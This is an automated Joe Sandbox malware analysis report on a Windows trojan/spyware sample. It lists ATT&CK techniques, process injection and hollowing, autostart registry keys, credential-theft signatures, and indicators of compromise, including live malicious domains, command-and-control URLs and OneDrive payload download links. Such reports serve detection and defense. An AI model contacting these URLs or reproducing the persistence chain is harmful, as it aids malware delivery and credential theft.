            Deobfuscate/Decode Files or Information            		1
            Input Capture            		13
            System Information Discovery            		Remote Desktop Protocol1
            Data from Local System            		Exfiltration Over Bluetooth11
            Encrypted Channel            		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsAt (Linux)Logon Script (Windows)11
            Registry Run Keys / Startup Folder            		2
            Obfuscated Files or Information            		Security Account Manager1
            Query Registry            		SMB/Windows Admin Shares1
            Email Collection            		Automated Exfiltration4
            Non-Application Layer Protocol            		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
            Software Packing            		NTDS221
            Security Software Discovery            		Distributed Component Object Model1
            Input Capture            		Scheduled Transfer115
            Application Layer Protocol            		SIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
            DLL Side-Loading            		LSA Secrets2
            Virtualization/Sandbox Evasion            		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.common1
            Masquerading            		Cached Domain Credentials2
            Process Discovery            		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
            External Remote ServicesScheduled TaskStartup ItemsStartup Items2
            Virtualization/Sandbox Evasion            		DCSync1
            Remote System Discovery            		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
            Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job912
            Process Injection            		Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
            Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)1
            Rundll32            		/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 680563 Sample: TR0627729920002.exe Startdate: 08/08/2022 Architecture: WINDOWS Score: 100 61 www.wellkept.info 2->61 63 www.meigsbuilds.online 2->63 65 3 other IPs or domains 2->65 99 Snort IDS alert for network traffic 2->99 101 Multi AV Scanner detection for domain / URL 2->101 103 Malicious sample detected (through community Yara rule) 2->103 105 6 other signatures 2->105 11 TR0627729920002.exe 1 18 2->11         started        signatures3 process4 dnsIp5 73 l-0004.l-dc-msedge.net 13.107.43.13, 443, 49728, 49737 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 11->73 75 192.168.2.1 unknown unknown 11->75 77 3 other IPs or domains 11->77 57 C:\Users\Public\Libraries\Jwjxmakrv.exe, PE32 11->57 dropped 59 C:\Users\...\Jwjxmakrv.exe:Zone.Identifier, ASCII 11->59 dropped 129 Creates multiple autostart registry keys 11->129 131 Writes to foreign memory regions 11->131 133 Allocates memory in foreign processes 11->133 135 2 other signatures 11->135 16 cmd.exe 1 11->16         started        file6 signatures7 process8 signatures9 91 Modifies the context of a thread in another process (thread injection) 16->91 93 Maps a DLL or memory area into another process 16->93 95 Sample uses process hollowing technique 16->95 97 2 other signatures 16->97 19 explorer.exe 1 8 16->19 injected 24 conhost.exe 16->24         started        process10 dnsIp11 67 naturathome.info 81.169.145.158, 49823, 80 STRATOSTRATOAGDE Germany 19->67 69 www.trendiddas.com 5.183.8.187, 49855, 80 INTERXSCH Germany 19->69 71 17 other IPs or domains 19->71 55 C:\Users\user\AppData\...\IconCachet0hh.exe, PE32 19->55 dropped 109 System process connects to network (likely due to code injection or exploit) 19->109 111 Benign windows process drops PE files 19->111 113 Performs DNS queries to domains with low reputation 19->113 115 Drops or copies cmd.exe with a different name (likely to bypass HIPS) 19->115 26 rundll32.exe 12 19->26         started        29 Jwjxmakrv.exe 16 19->29         started        32 Jwjxmakrv.exe 16 19->32         started        34 IconCachet0hh.exe 19->34         started        file12 signatures13 process14 dnsIp15 117 Tries to steal Mail credentials (via file / registry access) 26->117 119 Creates multiple autostart registry keys 26->119 121 Tries to harvest and steal browser information (history, passwords, etc) 26->121 127 3 other signatures 26->127 36 cmd.exe 26->36         started        39 cmd.exe 26->39         started        79 l-0003.l-dc-msedge.net 13.107.43.12, 443, 49746, 49748 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 29->79 81 ph-files.fe.1drv.com 29->81 87 2 other IPs or domains 29->87 123 Multi AV Scanner detection for dropped file 29->123 125 Machine Learning detection for dropped file 29->125 41 cmd.exe 1 29->41         started        83 ph-files.fe.1drv.com 32->83 85 onedrive.live.com 32->85 89 2 other IPs or domains 32->89 43 cmd.exe 1 32->43         started        45 conhost.exe 34->45         started        signatures16 process17 signatures18 107 Tries to harvest and steal browser information (history, passwords, etc) 36->107 47 conhost.exe 36->47         started        49 conhost.exe 39->49         started        51 conhost.exe 41->51         started        53 conhost.exe 43->53         started        process19

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            TR0627729920002.exe29%ReversingLabsWin32.Trojan.Injuke
            TR0627729920002.exe100%Joe Sandbox ML

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Users\Public\Libraries\Jwjxmakrv.exe100%Joe Sandbox ML
            C:\Users\Public\Libraries\Jwjxmakrv.exe29%ReversingLabsWin32.Trojan.Injuke
            C:\Users\user\AppData\Local\Temp\P1bxx\IconCachet0hh.exe0%MetadefenderBrowse
            C:\Users\user\AppData\Local\Temp\P1bxx\IconCachet0hh.exe0%ReversingLabs

            Unpacked PE Files

            SourceDetectionScannerLabelLinkDownload
            5.2.cmd.exe.50410000.4.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
            5.0.cmd.exe.50410000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
            5.0.cmd.exe.50410000.1.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
            0.2.TR0627729920002.exe.2162de8.1.unpack100%AviraTR/Patched.Ren.GenDownload File
            0.2.TR0627729920002.exe.21dc808.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
            5.0.cmd.exe.50410000.2.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
            5.0.cmd.exe.50410000.3.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

            Domains

            SourceDetectionScannerLabelLink
            kidsfundoor.com7%VirustotalBrowse

            URLs

            SourceDetectionScannerLabelLink
            http://www.trisuaka.xyz/uj3c/100%Avira URL Cloudmalware
            http://www.nomaxdic.com/uj3c/100%Avira URL Cloudmalware
            http://www.nomaxdic.com0%Avira URL Cloudsafe
            www.nutricognition.com/uj3c/100%Avira URL Cloudmalware
            http://www.emerge.deDVarFileInfo$0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            www.trisuaka.xyz
            		188.114.97.3
            		truetrue
              		unknown
              kidsfundoor.com
              		2.57.90.16
              		truetrueunknown
              www.trendiddas.com
              		5.183.8.187
              		truetrue
                		unknown
                l-0003.l-dc-msedge.net
                		13.107.43.12
                		truefalse
                  		unknown
                  www.moneytaoism.com
                  		156.226.60.131
                  		truetrue
                    		unknown
                    parkingpage.namecheap.com
                    		198.54.117.218
                    		truefalse
                      		high
                      forummind.com
                      		35.244.105.10
                      		truefalse
                        		unknown
                        naturathome.info
                        		81.169.145.158
                        		truetrue
                          		unknown
                          l-0004.l-dc-msedge.net
                          		13.107.43.13
                          		truefalse
                            		unknown
                            nutricognition.com
                            		34.102.136.180
                            		truefalse
                              		unknown
                              www.nomaxdic.com
                              		38.54.163.57
                              		truetrue
                                		unknown
                                wellkept.info
                                		15.197.142.173
                                		truetrue
                                  		unknown
                                  www.empireapothecary.com
                                  		154.55.180.56
                                  		truetrue
                                    		unknown
                                    www.meigsbuilds.online
                                    		209.17.116.163
                                    		truetrue
                                      		unknown
                                      www.gografic.com
                                      		unknown
                                      		unknowntrue
                                        		unknown
                                        2q5ira.ph.files.1drv.com
                                        		unknown
                                        		unknownfalse
                                          		high
                                          www.naturathome.info
                                          		unknown
                                          		unknowntrue
                                            		unknown
                                            www.6111.site
                                            		unknown
                                            		unknowntrue
                                              		unknown
                                              www.wellkept.info
                                              		unknown
                                              		unknowntrue
                                                		unknown
                                                www.forummind.com
                                                		unknown
                                                		unknowntrue
                                                  		unknown
                                                  onedrive.live.com
                                                  		unknown
                                                  		unknownfalse
                                                    		high
                                                    www.designgamagazine.com
                                                    		unknown
                                                    		unknowntrue
                                                      		unknown
                                                      www.kidsfundoor.com
                                                      		unknown
                                                      		unknowntrue
                                                        		unknown
                                                        www.choonchain.com
                                                        		unknown
                                                        		unknowntrue
                                                          		unknown
                                                          www.shopwithtrooperdavecom.com
                                                          		unknown
                                                          		unknowntrue
                                                            		unknown
                                                            www.huangse5.com
                                                            		unknown
                                                            		unknowntrue
                                                              		unknown
                                                              www.nutricognition.com
                                                              		unknown
                                                              		unknowntrue
                                                                		unknown

                                                                Contacted URLs

                                                                NameMaliciousAntivirus DetectionReputation
                                                                http://www.trisuaka.xyz/uj3c/true
                                                                • Avira URL Cloud: malware
                                                                		unknown
                                                                http://www.nomaxdic.com/uj3c/true
                                                                • Avira URL Cloud: malware
                                                                		unknown
                                                                https://2q5ira.ph.files.1drv.com/y4mPPeb9DbMgUpTw8rgi0z9dh_H8HrzfYIqodVmKxsKtJmWk00zgJ3zu481-zwoTvTa0cxGRrCYES6g2a0zaTIakDGUvozKOJciyD6JCpNiyjHZcmfPyDooT0h1JU_O8sSkgYGocwmlALM_59Ui23ibnwkt9D4viRLcZLL1t6g8vn3_wThdv1B88C73FcDGQ4N13iZgpf-DIJjM28kjlru3Pg/Jwjxmakrvkwfuijrnbpqlslhsyeopao?download&psid=1false
                                                                  		high
                                                                  https://2q5ira.ph.files.1drv.com/y4mtTOeeswFZvEvWO7PkDWtzJAdem80ecf7E9nGL_Zv4nrGYw4XHqnwQKr6FduyLWzPibKAFYV0xjQdV9_Sbrn3WQnCWQVi51NO3WbiwMfOxjZCKscbz07KqgJxS1eQqwWI1nY5Nm6kgY9vMOzq0OAhg_-tnzDbDTvoJ8m9VvdOhZc335o19UrBupw81DRG4jFsQqG8OamsctZsRjc20RRa-w/Jwjxmakrvkwfuijrnbpqlslhsyeopao?download&psid=1false
                                                                    		high
                                                                    www.nutricognition.com/uj3c/true
                                                                    • Avira URL Cloud: malware
                                                                    		low
                                                                    https://onedrive.live.com/download?cid=E0CF7F9E6AAF27EF&resid=E0CF7F9E6AAF27EF%21235&authkey=AEqvXl2m1mKwj2Ifalse
                                                                      		high

                                                                      URLs from Memory and Binaries

                                                                      NameSourceMaliciousAntivirus DetectionReputation
                                                                      https://onedrive.live.com/2AJwjxmakrv.exe, 00000008.00000002.323926711.0000000000820000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://onedrive.live.com/download?cid=E0CF7F9E6AAF27EF&resid=E0CF7F9E6AAF27EF%21235&authkey=AEqvXl2Jwjxmakrv.exe, 0000000E.00000002.354269896.0000000003598000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://2q5ira.ph.files.1drv.com/dKJwjxmakrv.exe, 0000000E.00000002.353337808.00000000008E7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://2q5ira.ph.files.1drv.com/y4mzqjhhxuQPPuOmBSzbYlb6397m5X2vhHIqRXXBSV57d_1VgTXNCbbqjd0KHfm6XfBJwjxmakrv.exe, 0000000E.00000003.319396319.00000000008F8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://onedrive.live.com/kJwjxmakrv.exe, 00000008.00000002.323926711.0000000000820000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://2q5ira.ph.files.1drv.com/y4mPPeb9DbMgUpTw8rgi0z9dh_H8HrzfYIqodVmKxsKtJmWk00zgJ3zu481-zwoTvTaJwjxmakrv.exe, 00000008.00000003.290900186.00000000008CA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://2q5ira.ph.files.1drv.com/Jwjxmakrv.exe, 00000008.00000002.323926711.0000000000820000.00000004.00000020.00020000.00000000.sdmp, Jwjxmakrv.exe, 0000000E.00000002.353337808.00000000008E7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://2q5ira.ph.files.1drv.com/y4mt_L56XfeV5AxASyoyGlTAONQRp7vzWLKSJ-3QlK1MqAbhWXL60OiqtjrBe3gN1xBJwjxmakrv.exe, 00000008.00000002.323926711.0000000000820000.00000004.00000020.00020000.00000000.sdmp, Jwjxmakrv.exe, 00000008.00000002.325432765.000000000089A000.00000004.00000020.00020000.00000000.sdmp, Jwjxmakrv.exe, 00000008.00000003.296621597.00000000008BA000.00000004.00000020.00020000.00000000.sdmp, Jwjxmakrv.exe, 00000008.00000003.289435198.00000000008C6000.00000004.00000020.00020000.00000000.sdmp, Jwjxmakrv.exe, 0000000E.00000002.352573194.0000000000864000.00000004.00000020.00020000.00000000.sdmp, Jwjxmakrv.exe, 0000000E.00000003.325315312.000000000090C000.00000004.00000020.00020000.00000000.sdmp, Jwjxmakrv.exe, 0000000E.00000003.317690202.0000000000900000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      http://www.nomaxdic.comrundll32.exe, 0000001D.00000002.780550685.000000000571B000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      		unknown
                                                                                      https://2q5ira.ph.files.1drv.com/y4mt_L56XfeV51Jwjxmakrv.exe, 0000000E.00000002.353475300.000000000090D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://2q5ira.ph.files.1drv.com/y4mAWAqMZkm6zn3dSzDj3WPCBsX3RiZWbRG2DylLyNQaP0-LRMHmuxHvvhn3WeqC6IbJwjxmakrv.exe, 0000000E.00000003.316208412.00000000008F8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://2q5ira.ph.files.1drv.com/9Jwjxmakrv.exe, 00000008.00000002.323926711.0000000000820000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://onedrive.live.com/Jwjxmakrv.exe, 0000000E.00000002.352573194.0000000000864000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              http://www.emerge.deDVarFileInfo$TR0627729920002.exe, Jwjxmakrv.exe.0.drfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              		low
                                                                                              https://2q5ira.ph.files.1drv.com/y4mtTOeeswFZvEvWO7PkDWtzJAdem80ecf7E9nGL_Zv4nrGYw4XHqnwQKr6FduyLWzPJwjxmakrv.exe, 00000008.00000002.325432765.000000000089A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                		high

                                                                                                World Map of Contacted IPs

                                                                                                • No. of IPs < 25%
                                                                                                • 25% < No. of IPs < 50%
                                                                                                • 50% < No. of IPs < 75%
                                                                                                • 75% < No. of IPs

                                                                                                Public IPs

                                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                                81.169.145.158
                                                                                                		naturathome.infoGermany
                                                                                                		6724STRATOSTRATOAGDEtrue
                                                                                                198.54.117.218
                                                                                                		parkingpage.namecheap.comUnited States
                                                                                                		22612NAMECHEAP-NETUSfalse
                                                                                                154.55.180.56
                                                                                                		www.empireapothecary.comUnited States
                                                                                                		174COGENT-174UStrue
                                                                                                13.107.43.12
                                                                                                		l-0003.l-dc-msedge.netUnited States
                                                                                                		8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                13.107.43.13
                                                                                                		l-0004.l-dc-msedge.netUnited States
                                                                                                		8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                5.183.8.187
                                                                                                		www.trendiddas.comGermany
                                                                                                		64463INTERXSCHtrue
                                                                                                188.114.97.3
                                                                                                		www.trisuaka.xyzEuropean Union
                                                                                                		13335CLOUDFLARENETUStrue
                                                                                                156.226.60.131
                                                                                                		www.moneytaoism.comSeychelles
                                                                                                		133201COMING-ASABCDEGROUPCOMPANYLIMITEDHKtrue
                                                                                                34.102.136.180
                                                                                                		nutricognition.comUnited States
                                                                                                		15169GOOGLEUSfalse
                                                                                                38.54.163.57
                                                                                                		www.nomaxdic.comUnited States
                                                                                                		174COGENT-174UStrue
                                                                                                2.57.90.16
                                                                                                		kidsfundoor.comLithuania
                                                                                                		47583AS-HOSTINGERLTtrue
                                                                                                209.17.116.163
                                                                                                		www.meigsbuilds.onlineUnited States
                                                                                                		55002DEFENSE-NETUStrue

                                                                                                Private

                                                                                                IP
                                                                                                192.168.2.1

                                                                                                General Information

                                                                                                Joe Sandbox Version:35.0.0 Citrine
                                                                                                Analysis ID:680563
                                                                                                Start date and time: 08/08/202220:11:072022-08-08 20:11:07 +02:00
                                                                                                Joe Sandbox Product:CloudBasic
                                                                                                Overall analysis duration:0h 12m 49s
                                                                                                Hypervisor based Inspection enabled:false
                                                                                                Report type:full
                                                                                                Sample file name:TR0627729920002.exe
                                                                                                Cookbook file name:default.jbs
                                                                                                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                Number of analysed new started processes analysed:46
                                                                                                Number of new started drivers analysed:0
                                                                                                Number of existing processes analysed:0
                                                                                                Number of existing drivers analysed:0
                                                                                                Number of injected processes analysed:2
                                                                                                Technologies:
                                                                                                • HCA enabled
                                                                                                • EGA enabled
                                                                                                • HDC enabled
                                                                                                • AMSI enabled
                                                                                                Analysis Mode:default
                                                                                                Analysis stop reason:Timeout
                                                                                                Detection:MAL
                                                                                                Classification:mal100.troj.spyw.expl.evad.winEXE@23/8@36/13
                                                                                                EGA Information:
                                                                                                • Successful, ratio: 50%
                                                                                                HDC Information:
                                                                                                • Successful, ratio: 100% (good quality ratio 86.9%)
                                                                                                • Quality average: 71.7%
                                                                                                • Quality standard deviation: 33.4%
                                                                                                HCA Information:
                                                                                                • Successful, ratio: 74%
                                                                                                • Number of executed functions: 14
                                                                                                • Number of non-executed functions: 172
                                                                                                Cookbook Comments:
                                                                                                • Found application associated with file extension: .exe
                                                                                                • Adjust boot time
                                                                                                • Enable AMSI
                                                                                                • Override analysis time to 240s for rundll32

                                                                                                Warnings

                                                                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, consent.exe, backgroundTaskHost.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe
                                                                                                • Excluded IPs from analysis (whitelisted): 23.211.6.115, 13.107.42.12, 13.107.42.13
                                                                                                • Excluded domains from analysis (whitelisted): www.bing.com, odc-web-brs.onedrive.akadns.net, client.wns.windows.com, fs.microsoft.com, odc-web-geo.onedrive.akadns.net, ph-files.ha.1drv.com.l-0003.dc-msedge.net.l-0003.l-msedge.net, ctldl.windowsupdate.com, store-images.s-microsoft.com-c.edgekey.net, odc-ph-files-geo.onedrive.akadns.net, odc-ph-files-brs.onedrive.akadns.net, arc.msn.com, ris.api.iris.microsoft.com, l-0004.l-msedge.net, e12564.dspb.akamaiedge.net, odwebpl.trafficmanager.net.l-0004.dc-msedge.net.l-0004.l-msedge.net, l-0003.l-msedge.net, login.live.com, store-images.s-microsoft.com, sls.update.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net
                                                                                                • Execution Graph export aborted for target TR0627729920002.exe, PID 5932 because there are no executed function
                                                                                                • Not all processes where analyzed, report is missing behavior information
                                                                                                • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                • Report size getting too big, too many NtOpenFile calls found.
                                                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                • Report size getting too big, too many NtQueryValueKey calls found.

                                                                                                Simulations

                                                                                                Behavior and APIs

                                                                                                TimeTypeDescription
                                                                                                20:12:06API Interceptor1x Sleep call for process: TR0627729920002.exe modified
                                                                                                20:12:18AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Jwjxmakrv C:\Users\Public\Libraries\vrkamxjwJ.url
                                                                                                20:12:26AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Jwjxmakrv C:\Users\Public\Libraries\vrkamxjwJ.url
                                                                                                20:12:28API Interceptor2x Sleep call for process: Jwjxmakrv.exe modified
                                                                                                20:15:28AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 5JJ89HI C:\Program Files (x86)\P1bxx\IconCachet0hh.exe
                                                                                                20:15:37AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run 5JJ89HI C:\Program Files (x86)\P1bxx\IconCachet0hh.exe

                                                                                                Joe Sandbox View / Context

                                                                                                IPs

                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                81.169.145.158Jvcfjyquhiqpaeumsljfzajfmzhrlkhzot.exeGet hashmaliciousBrowse
                                                                                                • www.naturathome.info/uj3c/?T6hL=DZ+z1JWWFK0A0tVRXlapgn/6a1fo754p6s0vRigfml2eez9Zabys9IeSDfOGLeM7iHsj&r6=fHSLCdCX2VkL6FU
                                                                                                vbc.exeGet hashmaliciousBrowse
                                                                                                • www.libroskolibris.com/tn61/?k4Y4z=/f6CYR0rvwctEP+4L3Nu/NnbmSpqCEjRjn9S+O6i4SWy54fVGAI3SrsUy0ZaVxrGRVaG&YP_=5jMHSdM0I
                                                                                                SecuriteInfo.com.UDS.Trojan-Spy.Win32.Noon.gen.9267.exeGet hashmaliciousBrowse
                                                                                                • www.naturathome.info/uj3c/?3f3DHf=DZ+z1JWWFK0A0tVRXlapgn/6a1fo754p6s0vRigfml2eez9Zabys9IeSDfOGLeM7iHsj&1bQ=IDKPXHgXALG0
                                                                                                INVOICE31722.exeGet hashmaliciousBrowse
                                                                                                • www.lumox-services.info/nhc5/?jR-Db=r7rLs+YJMTiwIq1Q249ygOJ7evoqiFnuE+v+RDu1vz0ePK6MY5h1Itcu5Bg93dLA0sJp&iP=5joHn6
                                                                                                GDs-#09283 DIAGRAM AND PRODUCT SPECIFICATIONS.pdl.exeGet hashmaliciousBrowse
                                                                                                • www.kratom-kaufen.com/huve/?M6APeF_P=BTLUQuVL+abGhyNEwjRRs5Xo4Cekkc3aDgR9VCqvNKJELFolnb1CR2fKQHf+aGPzSetl&FDHH=2d2dPfC0
                                                                                                emotet2.docGet hashmaliciousBrowse
                                                                                                • purkl.de/FndvIeH/
                                                                                                emotet2.docGet hashmaliciousBrowse
                                                                                                • purkl.de/FndvIeH/

                                                                                                Domains

                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                www.trendiddas.comJvcfjyquhiqpaeumsljfzajfmzhrlkhzot.exeGet hashmaliciousBrowse
                                                                                                • 5.183.8.187
                                                                                                listi#U0107 obavijesti Prijenos pdf.exeGet hashmaliciousBrowse
                                                                                                • 5.183.8.187
                                                                                                Siparis eklendi.exeGet hashmaliciousBrowse
                                                                                                • 5.183.8.187
                                                                                                factura pendiente de pago pdf.exeGet hashmaliciousBrowse
                                                                                                • 5.183.8.187
                                                                                                l-0003.l-dc-msedge.netASLF1SR00116 40HC 21T05 DALIAN TO GENOVA..exeGet hashmaliciousBrowse
                                                                                                • 13.107.43.12
                                                                                                SecuriteInfo.com.W32.AIDetect.malware2.12327.exeGet hashmaliciousBrowse
                                                                                                • 13.107.43.12
                                                                                                mWyPrcv7Pl.exeGet hashmaliciousBrowse
                                                                                                • 13.107.43.12
                                                                                                f1M2XRyWg0.exeGet hashmaliciousBrowse
                                                                                                • 13.107.43.12
                                                                                                Uyljxgntczjzqsjbfhyebvyzaflytpubrw.exeGet hashmaliciousBrowse
                                                                                                • 13.107.43.12
                                                                                                VoRTaSs6hl.exeGet hashmaliciousBrowse
                                                                                                • 13.107.43.12
                                                                                                Requisition ,,xp.exeGet hashmaliciousBrowse
                                                                                                • 13.107.43.12
                                                                                                Requisition ,,xp.exeGet hashmaliciousBrowse
                                                                                                • 13.107.43.12
                                                                                                7JYtzqYsLy.exeGet hashmaliciousBrowse
                                                                                                • 13.107.43.12
                                                                                                wVW8aDHCoc.exeGet hashmaliciousBrowse
                                                                                                • 13.107.43.12
                                                                                                T0YkB3FMcm.exeGet hashmaliciousBrowse
                                                                                                • 13.107.43.12
                                                                                                Osonnkabspxchcgazdewhmevyxlgrzmucn.exeGet hashmaliciousBrowse
                                                                                                • 13.107.43.12
                                                                                                Osonnkabspxchcgazdewhmevyxlgrzmucn.exeGet hashmaliciousBrowse
                                                                                                • 13.107.43.12
                                                                                                Payment Advice - Advice Ref[GLV404865688] Pr.exeGet hashmaliciousBrowse
                                                                                                • 13.107.43.12
                                                                                                RQNB00016358.pdf.exeGet hashmaliciousBrowse
                                                                                                • 13.107.43.12
                                                                                                RQNB00016358.pdf.exeGet hashmaliciousBrowse
                                                                                                • 13.107.43.12
                                                                                                pea.exeGet hashmaliciousBrowse
                                                                                                • 13.107.43.12
                                                                                                INVOICES.exeGet hashmaliciousBrowse
                                                                                                • 13.107.43.12
                                                                                                newfile.exeGet hashmaliciousBrowse
                                                                                                • 13.107.43.12
                                                                                                IMG_19003426774899T501.exeGet hashmaliciousBrowse
                                                                                                • 13.107.43.12

                                                                                                ASNs

                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                NAMECHEAP-NETUSPaystub_ACH_from_Seminolecountyfl_Association_Management_Inc._732456_0138.pdf.HtmlGet hashmaliciousBrowse
                                                                                                • 185.61.153.76
                                                                                                Belgeleri kontrol edin.exeGet hashmaliciousBrowse
                                                                                                • 198.54.117.215
                                                                                                botx.x86Get hashmaliciousBrowse
                                                                                                • 162.213.255.244
                                                                                                Payment_Advice.exeGet hashmaliciousBrowse
                                                                                                • 199.192.20.117
                                                                                                https://objectstorage.eu-frankfurt-1.oraclecloud.com/n/frtdvcg6uzqm/b/bucket-20220728-1700/o/blackie.html#joe.smith@fake.gov.auGet hashmaliciousBrowse
                                                                                                • 162.0.228.91
                                                                                                SecuriteInfo.com.Trojan.Inject4.39532.243.exeGet hashmaliciousBrowse
                                                                                                • 198.54.122.135
                                                                                                Universalmiddel169.exeGet hashmaliciousBrowse
                                                                                                • 199.192.26.54
                                                                                                https://denisaolldashi.clickfunnels.com/auto-webinar-registration1659690849768Get hashmaliciousBrowse
                                                                                                • 199.188.200.108
                                                                                                https://denisaolldashi.clickfunnels.com/auto-webinar-registration1659690849768Get hashmaliciousBrowse
                                                                                                • 199.188.200.108
                                                                                                Versanddetails.exeGet hashmaliciousBrowse
                                                                                                • 63.250.38.32
                                                                                                http://www.malware-traffic-analysis.net/2018/02/16/index.htmlGet hashmaliciousBrowse
                                                                                                • 199.201.110.204
                                                                                                KYmFioOZjadXGyN.exeGet hashmaliciousBrowse
                                                                                                • 199.192.20.117
                                                                                                EVOMIKS EF 383330.exeGet hashmaliciousBrowse
                                                                                                • 192.64.115.199
                                                                                                RFQ 60923291.docGet hashmaliciousBrowse
                                                                                                • 192.64.117.134
                                                                                                RFQ 010844.exeGet hashmaliciousBrowse
                                                                                                • 198.54.117.216
                                                                                                zapytanie ofertowe09356.exeGet hashmaliciousBrowse
                                                                                                • 198.54.117.216
                                                                                                http://ska-lv.9129.omnistonegroup.com/#info@ska-lv.deGet hashmaliciousBrowse
                                                                                                • 198.54.120.199
                                                                                                http://ska-lv.9129.omnistonegroup.com/#info@ska-lv.deGet hashmaliciousBrowse
                                                                                                • 198.54.120.199
                                                                                                Sat#U0131n Alma Emri Metak_JJO-003, PDF.exeGet hashmaliciousBrowse
                                                                                                • 198.54.117.211
                                                                                                yuUeum2cpl.exeGet hashmaliciousBrowse
                                                                                                • 198.54.117.212
                                                                                                STRATOSTRATOAGDEbotx.mipsGet hashmaliciousBrowse
                                                                                                • 85.214.83.158
                                                                                                botx.armGet hashmaliciousBrowse
                                                                                                • 85.214.134.187
                                                                                                Sn9wY2gIoWGet hashmaliciousBrowse
                                                                                                • 85.215.233.2
                                                                                                YNr3nu7PwWGet hashmaliciousBrowse
                                                                                                • 85.215.233.3
                                                                                                KLAbE2XW4iGet hashmaliciousBrowse
                                                                                                • 85.215.233.1
                                                                                                GBjJCn46k8Get hashmaliciousBrowse
                                                                                                • 85.214.69.88
                                                                                                documentazione 68668.xlsGet hashmaliciousBrowse
                                                                                                • 85.214.67.203
                                                                                                Universalmiddel169.exeGet hashmaliciousBrowse
                                                                                                • 81.169.145.94
                                                                                                Sat#U0131n Alma Emri Metak_JJO-003, PDF.exeGet hashmaliciousBrowse
                                                                                                • 193.141.3.66
                                                                                                CgFJBVFNlg.exeGet hashmaliciousBrowse
                                                                                                • 85.214.228.140
                                                                                                vbc.exeGet hashmaliciousBrowse
                                                                                                • 193.141.3.66
                                                                                                mipsGet hashmaliciousBrowse
                                                                                                • 81.169.242.89
